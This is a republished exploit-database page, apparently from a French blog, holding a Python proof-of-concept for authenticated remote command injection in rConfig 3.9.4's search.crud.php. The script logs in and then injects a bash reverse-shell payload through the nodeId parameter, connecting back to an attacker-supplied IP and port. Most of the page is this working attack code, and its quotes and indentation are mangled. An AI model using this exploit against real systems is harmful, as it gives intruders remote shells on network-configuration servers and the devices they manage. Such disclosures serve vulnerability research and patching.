rConfig 3.9.4 Remote Command Injection ≈ Packet Storm


# Exploit Title: rConfig 3.9.4 – ‘search.crud.php’ Remote Command Injection
# Date: 2020-03-21
# Exploit Author: Matthew Aberegg, Michael Burkey
# Vendor Homepage: https://www.rconfig.com
# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.4.zip
# Version: rConfig 3.9.4
# Tested on: Cent OS 7 (1908)

#!/usr/bin/python3

import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 6:
print(« [~] Usage : https://rconfig_host, Username, Password, Attacker IP, Attacker Port »)
exit()

host = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
attacker_ip = sys.argv[4]
attacker_port = sys.argv[5]

login_url = host + « /lib/crud/userprocess.php »
payload = « || bash -i >& /dev/tcp/{0}/{1} 0>&1 ; ».format(attacker_ip, attacker_port)
encoded_payload = urllib.parse.quote_plus(payload)

def exploit():
s = requests.Session()

res = s.post(
login_url,
data={
‘user’: username,
‘pass’: password,
‘sublogin’: 1
},
verify=False,
allow_redirects=True
)

injection_url = « {0}/lib/crud/search.crud.php?searchTerm=test&catId=2&numLineStr=&nodeId={1}&catCommand=showcdpneigh*.txt&noLines= ».format(host, encoded_payload)
res = s.get(injection_url, verify=False)

if res.status_code != 200:
print(« [~] Failed to connect »)

if __name__ == ‘__main__’:
exploit()



Source link

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *